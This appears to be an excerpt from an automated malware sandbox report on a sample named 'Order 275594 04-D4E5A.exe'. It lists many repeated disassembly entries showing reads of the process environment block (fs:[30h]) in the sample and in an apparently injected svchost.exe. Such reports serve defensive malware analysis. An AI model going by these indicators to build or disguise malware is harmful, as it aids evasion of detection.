          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D82 mov eax, dword ptr fs:[00000030h]17_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A1DB5 mov eax, dword ptr fs:[00000030h]17_2_019A1DB5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A1DB5 mov eax, dword ptr fs:[00000030h]17_2_019A1DB5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A1DB5 mov eax, dword ptr fs:[00000030h]17_2_019A1DB5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A35A1 mov eax, dword ptr fs:[00000030h]17_2_019A35A1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3FDE2 mov eax, dword ptr fs:[00000030h]17_2_01A3FDE2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3FDE2 mov eax, dword ptr fs:[00000030h]17_2_01A3FDE2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3FDE2 mov eax, dword ptr fs:[00000030h]17_2_01A3FDE2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3FDE2 mov eax, dword ptr fs:[00000030h]17_2_01A3FDE2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A28DF1 mov eax, dword ptr fs:[00000030h]17_2_01A28DF1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov ecx, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6DC9 mov eax, dword ptr fs:[00000030h]17_2_019F6DC9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198D5E0 mov eax, dword ptr fs:[00000030h]17_2_0198D5E0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198D5E0 mov eax, dword ptr fs:[00000030h]17_2_0198D5E0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48D34 mov eax, dword ptr fs:[00000030h]17_2_01A48D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3E539 mov eax, dword ptr fs:[00000030h]17_2_01A3E539
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4D3B mov eax, dword ptr fs:[00000030h]17_2_019A4D3B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4D3B mov eax, dword ptr fs:[00000030h]17_2_019A4D3B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4D3B mov eax, dword ptr fs:[00000030h]17_2_019A4D3B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197AD30 mov eax, dword ptr fs:[00000030h]17_2_0197AD30
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019FA537 mov eax, dword ptr fs:[00000030h]17_2_019FA537
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01983D34 mov eax, dword ptr fs:[00000030h]17_2_01983D34
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01997D50 mov eax, dword ptr fs:[00000030h]17_2_01997D50
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B3D43 mov eax, dword ptr fs:[00000030h]17_2_019B3D43
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F3540 mov eax, dword ptr fs:[00000030h]17_2_019F3540
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A23D40 mov eax, dword ptr fs:[00000030h]17_2_01A23D40
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199C577 mov eax, dword ptr fs:[00000030h]17_2_0199C577
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199C577 mov eax, dword ptr fs:[00000030h]17_2_0199C577
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198849B mov eax, dword ptr fs:[00000030h]17_2_0198849B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34496 mov eax, dword ptr fs:[00000030h]17_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A314FB mov eax, dword ptr fs:[00000030h]17_2_01A314FB
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6CF0 mov eax, dword ptr fs:[00000030h]17_2_019F6CF0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6CF0 mov eax, dword ptr fs:[00000030h]17_2_019F6CF0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6CF0 mov eax, dword ptr fs:[00000030h]17_2_019F6CF0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48CD6 mov eax, dword ptr fs:[00000030h]17_2_01A48CD6
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6C0A mov eax, dword ptr fs:[00000030h]17_2_019F6C0A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6C0A mov eax, dword ptr fs:[00000030h]17_2_019F6C0A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6C0A mov eax, dword ptr fs:[00000030h]17_2_019F6C0A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F6C0A mov eax, dword ptr fs:[00000030h]17_2_019F6C0A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31C06 mov eax, dword ptr fs:[00000030h]17_2_01A31C06
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A4740D mov eax, dword ptr fs:[00000030h]17_2_01A4740D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A4740D mov eax, dword ptr fs:[00000030h]17_2_01A4740D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A4740D mov eax, dword ptr fs:[00000030h]17_2_01A4740D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019ABC2C mov eax, dword ptr fs:[00000030h]17_2_019ABC2C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AA44B mov eax, dword ptr fs:[00000030h]17_2_019AA44B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AAC7B mov eax, dword ptr fs:[00000030h]17_2_019AAC7B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0C450 mov eax, dword ptr fs:[00000030h]17_2_01A0C450
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0C450 mov eax, dword ptr fs:[00000030h]17_2_01A0C450
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199746D mov eax, dword ptr fs:[00000030h]17_2_0199746D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F7794 mov eax, dword ptr fs:[00000030h]17_2_019F7794
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F7794 mov eax, dword ptr fs:[00000030h]17_2_019F7794
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F7794 mov eax, dword ptr fs:[00000030h]17_2_019F7794
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01988794 mov eax, dword ptr fs:[00000030h]17_2_01988794
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B37F5 mov eax, dword ptr fs:[00000030h]17_2_019B37F5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199F716 mov eax, dword ptr fs:[00000030h]17_2_0199F716
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AA70E mov eax, dword ptr fs:[00000030h]17_2_019AA70E
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AA70E mov eax, dword ptr fs:[00000030h]17_2_019AA70E
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199B73D mov eax, dword ptr fs:[00000030h]17_2_0199B73D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199B73D mov eax, dword ptr fs:[00000030h]17_2_0199B73D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A4070D mov eax, dword ptr fs:[00000030h]17_2_01A4070D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A4070D mov eax, dword ptr fs:[00000030h]17_2_01A4070D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AE730 mov eax, dword ptr fs:[00000030h]17_2_019AE730
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0FF10 mov eax, dword ptr fs:[00000030h]17_2_01A0FF10
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0FF10 mov eax, dword ptr fs:[00000030h]17_2_01A0FF10
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01974F2E mov eax, dword ptr fs:[00000030h]17_2_01974F2E
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01974F2E mov eax, dword ptr fs:[00000030h]17_2_01974F2E
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48F6A mov eax, dword ptr fs:[00000030h]17_2_01A48F6A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198EF40 mov eax, dword ptr fs:[00000030h]17_2_0198EF40
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198FF60 mov eax, dword ptr fs:[00000030h]17_2_0198FF60
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A40EA5 mov eax, dword ptr fs:[00000030h]17_2_01A40EA5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A40EA5 mov eax, dword ptr fs:[00000030h]17_2_01A40EA5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A40EA5 mov eax, dword ptr fs:[00000030h]17_2_01A40EA5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0FE87 mov eax, dword ptr fs:[00000030h]17_2_01A0FE87
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F46A7 mov eax, dword ptr fs:[00000030h]17_2_019F46A7
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A36CC mov eax, dword ptr fs:[00000030h]17_2_019A36CC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B8EC7 mov eax, dword ptr fs:[00000030h]17_2_019B8EC7
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2FEC0 mov eax, dword ptr fs:[00000030h]17_2_01A2FEC0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48ED6 mov eax, dword ptr fs:[00000030h]17_2_01A48ED6
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A16E0 mov ecx, dword ptr fs:[00000030h]17_2_019A16E0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019876E2 mov eax, dword ptr fs:[00000030h]17_2_019876E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AA61C mov eax, dword ptr fs:[00000030h]17_2_019AA61C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AA61C mov eax, dword ptr fs:[00000030h]17_2_019AA61C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197C600 mov eax, dword ptr fs:[00000030h]17_2_0197C600
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197C600 mov eax, dword ptr fs:[00000030h]17_2_0197C600
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197C600 mov eax, dword ptr fs:[00000030h]17_2_0197C600
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A8E00 mov eax, dword ptr fs:[00000030h]17_2_019A8E00
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2FE3F mov eax, dword ptr fs:[00000030h]17_2_01A2FE3F
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A31608 mov eax, dword ptr fs:[00000030h]17_2_01A31608
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197E620 mov eax, dword ptr fs:[00000030h]17_2_0197E620
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01987E41 mov eax, dword ptr fs:[00000030h]17_2_01987E41
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01987E41 mov eax, dword ptr fs:[00000030h]17_2_01987E41
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01987E41 mov eax, dword ptr fs:[00000030h]17_2_01987E41
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01987E41 mov eax, dword ptr fs:[00000030h]17_2_01987E41
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01987E41 mov eax, dword ptr fs:[00000030h]17_2_01987E41
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01987E41 mov eax, dword ptr fs:[00000030h]17_2_01987E41
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3AE44 mov eax, dword ptr fs:[00000030h]17_2_01A3AE44
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3AE44 mov eax, dword ptr fs:[00000030h]17_2_01A3AE44
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199AE73 mov eax, dword ptr fs:[00000030h]17_2_0199AE73
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199AE73 mov eax, dword ptr fs:[00000030h]17_2_0199AE73
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199AE73 mov eax, dword ptr fs:[00000030h]17_2_0199AE73
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199AE73 mov eax, dword ptr fs:[00000030h]17_2_0199AE73
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199AE73 mov eax, dword ptr fs:[00000030h]17_2_0199AE73
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198766D mov eax, dword ptr fs:[00000030h]17_2_0198766D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A309 mov eax, dword ptr fs:[00000030h]23_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322131B mov eax, dword ptr fs:[00000030h]23_2_0322131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316F358 mov eax, dword ptr fs:[00000030h]23_2_0316F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316DB40 mov eax, dword ptr fs:[00000030h]23_2_0316DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03193B7A mov eax, dword ptr fs:[00000030h]23_2_03193B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03193B7A mov eax, dword ptr fs:[00000030h]23_2_03193B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316DB60 mov ecx, dword ptr fs:[00000030h]23_2_0316DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03238B58 mov eax, dword ptr fs:[00000030h]23_2_03238B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03235BA5 mov eax, dword ptr fs:[00000030h]23_2_03235BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319B390 mov eax, dword ptr fs:[00000030h]23_2_0319B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03192397 mov eax, dword ptr fs:[00000030h]23_2_03192397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319138B mov eax, dword ptr fs:[00000030h]23_2_0319138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319138B mov eax, dword ptr fs:[00000030h]23_2_0319138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319138B mov eax, dword ptr fs:[00000030h]23_2_0319138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03171B8F mov eax, dword ptr fs:[00000030h]23_2_03171B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03171B8F mov eax, dword ptr fs:[00000030h]23_2_03171B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0321D380 mov ecx, dword ptr fs:[00000030h]23_2_0321D380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322138A mov eax, dword ptr fs:[00000030h]23_2_0322138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03194BAD mov eax, dword ptr fs:[00000030h]23_2_03194BAD
